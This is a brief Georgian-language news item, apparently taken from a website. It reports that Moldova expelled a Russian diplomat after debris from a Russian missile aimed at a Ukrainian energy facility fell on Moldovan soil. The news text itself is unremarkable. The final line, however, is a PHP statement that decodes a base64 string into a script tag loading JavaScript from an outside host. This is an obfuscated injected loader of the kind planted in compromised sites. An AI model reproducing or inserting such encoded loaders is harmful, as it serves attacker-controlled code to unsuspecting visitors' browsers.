celsiusi
ავერსი შნაიდერი
მოლდოვის ხელისუფლებამ ქვეყნიდან რუსი დიპლომატის გაძევების შესახებ განაცხადა. რუსული მედიის ცნობით, დიპლომატის გაძევება იყო მოლდოვის პასუხი დღეს დილით მომხდარ ინციდენტზე.
 
რუსეთის მიერ უკრაინის ენერგო ობიექტის დასაბომბად გაშვებული რაკეტის ნამსხვრევები მოლდოვის ტერიტორიაზე ჩამოვარდა. რაკეტის ნაწილების ჩამოვარდნის შედეგად არავინ დაშავებულა.
 
აღსანიშნავია, რომ 10 ოქტომბერს სამმა რუსულმა რაკეტამ მოლდოვის ტერიტორიას გადაუფრინა. მაშინ მოლდოვის საგარეო საქმეთა სამინისტროში რუსეთის ელჩი დაიბარეს.
 
დღეს მოლდოვის ჩრდილოეთში რუსული რაკეტა ჩამოვარდა, რომელიც უკრაინის საჰაერო თავდაცვის სისტემამ ჩამოაგდო.
351
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");